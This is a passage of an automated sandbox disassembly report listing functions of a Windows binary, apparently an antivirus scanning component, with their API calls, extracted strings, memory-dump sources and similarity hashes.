Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214

Function 0000000140002DE0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 166registryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140002E63
LeaveCriticalSection.KERNEL32 ref: 0000000140002EE7
EnterCriticalSection.KERNEL32 ref: 0000000140002EF9
EnterCriticalSection.KERNEL32 ref: 0000000140002F35
LeaveCriticalSection.KERNEL32 ref: 0000000140002FC0
RegCreateKeyExW.ADVAPI32 ref: 000000014000300B
RegSetValueExW.ADVAPI32 ref: 000000014000304C
RegCloseKey.ADVAPI32 ref: 0000000140003057
LeaveCriticalSection.KERNEL32 ref: 0000000140003064

Strings

action, xrefs: 0000000140003020
?, xrefs: 0000000140002FFE
SYSTEM\CurrentControlSet\Services\vseamps\Parameters, xrefs: 0000000140002FD5

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: CriticalSection$EnterLeave$CloseCreateValue
String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
API String ID: 93015348-1041928032
Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700

Function 0000000140002B40 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 141libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 0000000140002B91
GetProcAddress.KERNEL32 ref: 0000000140002BAD
GetProcAddress.KERNEL32 ref: 0000000140002BC8
GetProcAddress.KERNEL32 ref: 0000000140002BE3
EnterCriticalSection.KERNEL32 ref: 0000000140002C0D
LeaveCriticalSection.KERNEL32 ref: 0000000140002C9A
EnterCriticalSection.KERNEL32 ref: 0000000140002CAF
LeaveCriticalSection.KERNEL32 ref: 0000000140002D2D

Strings

vseqrtInit, xrefs: 0000000140002BA3
vseqrtAdd, xrefs: 0000000140002BD5
vseqrtRelease, xrefs: 0000000140002BBA
vseqrt.dll, xrefs: 0000000140002B7E

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
API String ID: 3682727354-300733478
Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740

Function 00000001400033E0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 126memorytimeCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140003406
SetWaitableTimer.KERNEL32 ref: 0000000140003432
#4.VSELOG ref: 000000014000346A
GetProcessHeap.KERNEL32 ref: 000000014000351C
HeapReAlloc.KERNEL32 ref: 0000000140003531
GetProcessHeap.KERNEL32 ref: 0000000140003539
HeapAlloc.KERNEL32 ref: 0000000140003547
#4.VSELOG ref: 00000001400035DD
LeaveCriticalSection.KERNEL32 ref: 00000001400035E9
LeaveCriticalSection.KERNEL32 ref: 00000001400035FA

Strings

amps_Init: iFlags=%d, pid=%d, sid=%d, xrefs: 0000000140003452
amps_Init: done, pHandle=%p, xrefs: 00000001400035CC

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
API String ID: 2587151837-1427723692
Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700

Function 0000000140004D10 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 81libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000000140004D43
GetProcAddress.KERNEL32 ref: 0000000140004D62
GetFileAttributesW.KERNEL32 ref: 0000000140004DE9
LoadLibraryW.KERNEL32 ref: 0000000140004DF7
GetCurrentDirectoryW.KERNEL32 ref: 0000000140004E1C
SetCurrentDirectoryW.KERNEL32 ref: 0000000140004E27
LoadLibraryW.KERNEL32 ref: 0000000140004E30
SetCurrentDirectoryW.KERNEL32 ref: 0000000140004E41

Strings

SetDllDirectoryW, xrefs: 0000000140004D58
kernel32.dll, xrefs: 0000000140004D3C

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
String ID: SetDllDirectoryW$kernel32.dll
API String ID: 3184163350-3826188083
Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40

Function 0000000140004BA0 Relevance: 18.1, APIs: 9, Strings: 3, Instructions: 80memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 0000000140004BE7
GetProcessHeap.KERNEL32 ref: 0000000140004BF6
HeapAlloc.KERNEL32 ref: 0000000140004C04
lstrlenW.KERNEL32 ref: 0000000140004C3E
GetProcessHeap.KERNEL32 ref: 0000000140004C4D
HeapAlloc.KERNEL32 ref: 0000000140004C5B
lstrlenW.KERNEL32 ref: 0000000140004C8E
GetProcessHeap.KERNEL32 ref: 0000000140004C9D
HeapAlloc.KERNEL32 ref: 0000000140004CAB

Strings

Security=impersonation static true, xrefs: 0000000140004C80, 0000000140004CBE
ampIfEp, xrefs: 0000000140004C29, 0000000140004C6E
ncalrpc, xrefs: 0000000140004BAF, 0000000140004C17

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen
String ID: Security=impersonation static true$ampIfEp$ncalrpc
API String ID: 3424473247-996641649
Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700

Function 000000014000A740 Relevance: 16.9, APIs: 11, Instructions: 354COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32 ref: 000000014000A7AA
GetLastError.KERNEL32 ref: 000000014000A7BA
MultiByteToWideChar.KERNEL32 ref: 000000014000A874
MultiByteToWideChar.KERNEL32 ref: 000000014000A921
LCMapStringW.KERNEL32 ref: 000000014000A944
LCMapStringW.KERNEL32 ref: 000000014000A98D
LCMapStringW.KERNEL32 ref: 000000014000AA24
WideCharToMultiByte.KERNEL32 ref: 000000014000AA65
LCMapStringA.KERNEL32 ref: 000000014000AB13
LCMapStringA.KERNEL32 ref: 000000014000ABC6
LCMapStringA.KERNEL32 ref: 000000014000AC4C

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: String$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1775797328-0
Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700

Function 0000000140009C30 Relevance: 16.6, APIs: 11, Instructions: 150COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
String ID:
API String ID: 1232609184-0
Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300

Function 0000000140002740 Relevance: 16.6, APIs: 10, Strings: 1, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001AA6
Part of subcall function 0000000140001A30: LeaveCriticalSection.KERNEL32 ref: 0000000140001B30
Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001B48
Part of subcall function 0000000140001A30: LeaveCriticalSection.KERNEL32 ref: 0000000140001BC9
Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001BE6

EnterCriticalSection.KERNEL32 ref: 00000001400027B2
LeaveCriticalSection.KERNEL32 ref: 000000014000286E
GetProcessHeap.KERNEL32 ref: 000000014000287F
HeapFree.KERNEL32 ref: 000000014000288D
GetProcessHeap.KERNEL32 ref: 000000014000289D
HeapFree.KERNEL32 ref: 00000001400028AB
GetProcessHeap.KERNEL32 ref: 00000001400028BB
HeapFree.KERNEL32 ref: 00000001400028C9
GetProcessHeap.KERNEL32 ref: 00000001400028D9
HeapFree.KERNEL32 ref: 00000001400028E7

Strings

H, xrefs: 000000014000278C

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: Heap$CriticalSection$EnterFreeProcess$Leave
String ID: H
API String ID: 2107338056-2852464175
Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300

Function 0000000140003200 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 100timeCOMMON

Download Yara Rule

APIs

#4.VSELOG ref: 0000000140003242
EnterCriticalSection.KERNEL32 ref: 0000000140003257
LeaveCriticalSection.KERNEL32 ref: 00000001400032D9
#4.VSELOG ref: 0000000140003353

Part of subcall function 0000000140002B40: LoadLibraryW.KERNEL32 ref: 0000000140002B91
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BAD
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BC8
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BE3
Part of subcall function 0000000140002B40: EnterCriticalSection.KERNEL32 ref: 0000000140002C0D
Part of subcall function 0000000140002B40: LeaveCriticalSection.KERNEL32 ref: 0000000140002C9A
Part of subcall function 0000000140002B40: EnterCriticalSection.KERNEL32 ref: 0000000140002CAF
Part of subcall function 0000000140002B40: LeaveCriticalSection.KERNEL32 ref: 0000000140002D2D

#4.VSELOG ref: 0000000140003389
SetWaitableTimer.KERNEL32 ref: 00000001400033BE

Strings

fnCallback: hScan=%d, quarantine, result %d, xrefs: 000000014000333F
fnCallback: hScan=%d, evId=%d, context=%p, xrefs: 000000014000323B
fnCallback: hScan=%d, putting event %d into listening threads queues, xrefs: 0000000140003372

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
API String ID: 1322048431-2685357988
Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740

Function 0000000140003D50 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75timeCOMMON

Download Yara Rule

APIs

#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003D84
EnterCriticalSection.KERNEL32(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003DA3
#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E19
LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E25
#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E66
SetWaitableTimer.KERNEL32 ref: 0000000140003EA6

Strings

doCleanup: enter, cAmpEntry %p, xrefs: 0000000140003D76
doCleanup: pid %d, removing cAmpEntry, index is %d, xrefs: 0000000140003E08
doCleanup: pid %d, marking the cAmpEntry pointer for deletion, xrefs: 0000000140003E58

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: CriticalSection$EnterLeaveTimerWaitable
String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
API String ID: 2984211723-3002863673
Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710

Function 00000001400021A0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 65COMMON

Download Yara Rule

APIs

#4.VSELOG ref: 00000001400021D4
OpenProcess.KERNEL32 ref: 00000001400021F7
#4.VSELOG ref: 000000014000223A
WaitForMultipleObjects.KERNEL32 ref: 000000014000224F
CloseHandle.KERNEL32 ref: 000000014000225A
#4.VSELOG ref: 0000000140002294

Strings

doMonitor: monitoring process id=%d, xrefs: 000000014000222C
fnMonitor: monitor thread for ctx %p, xrefs: 00000001400021C6
doMonitor: end process id=%d, result from WaitForMultipleObjects=%d, xrefs: 0000000140002283

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: CloseHandleMultipleObjectsOpenProcessWait
String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
API String ID: 678758403-4129911376
Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710

Function 0000000140001750 Relevance: 15.1, APIs: 12, Instructions: 133memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 0000000140001797
GetProcessHeap.KERNEL32 ref: 00000001400017A6
HeapAlloc.KERNEL32 ref: 00000001400017B4
lstrlenW.KERNEL32 ref: 00000001400017EC
GetProcessHeap.KERNEL32 ref: 00000001400017FB
HeapAlloc.KERNEL32 ref: 0000000140001809
lstrlenW.KERNEL32 ref: 000000014000183F
GetProcessHeap.KERNEL32 ref: 000000014000184E
HeapAlloc.KERNEL32 ref: 000000014000185C
lstrlenW.KERNEL32 ref: 000000014000188D
GetProcessHeap.KERNEL32 ref: 000000014000189C
HeapAlloc.KERNEL32 ref: 00000001400018AA

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen
String ID:
API String ID: 3424473247-0
Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700

Function 0000000140012C70 Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 415COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000000140011270: RtlLookupFunctionEntry.KERNEL32 ref: 00000001400112F1

__GetUnwindTryBlock.LIBCMT ref: 0000000140012CDD
__SetUnwindTryBlock.LIBCMT ref: 0000000140012D05
__GetUnwindTryBlock.LIBCMT ref: 0000000140012D15
_SetThrowImageBase.LIBCMT ref: 0000000140012DA6

Strings

csm, xrefs: 0000000140012DC1
bad exception, xrefs: 0000000140012E4A
csm, xrefs: 0000000140012E97
csm, xrefs: 0000000140012D2F

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
String ID: bad exception$csm$csm$csm
API String ID: 3766904988-820278400
Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700

Function 0000000140004750 Relevance: 13.6, APIs: 9, Instructions: 80sleepCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140004A0F
LeaveCriticalSection.KERNEL32 ref: 0000000140004A1D
WaitForMultipleObjects.KERNEL32 ref: 0000000140004A44
Sleep.KERNEL32 ref: 0000000140004A75
EnterCriticalSection.KERNEL32 ref: 0000000140004A7F
SetEvent.KERNEL32 ref: 0000000140004AC5
ResetEvent.KERNEL32 ref: 0000000140004ACF
LeaveCriticalSection.KERNEL32 ref: 0000000140004AD9
WaitForMultipleObjects.KERNEL32 ref: 0000000140004B0D

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
String ID:
API String ID: 2707001247-0
Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708

Function 00007FFDA55D4804 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FFDA55D4861

Part of subcall function 00007FFDA55D6BC4: __GetUnwindTryBlock.LIBCMT ref: 00007FFDA55D6C07
Part of subcall function 00007FFDA55D6BC4: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FFDA55D6C2C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFDA55D4939
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FFDA55D4B87
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDA55D4C94

Strings

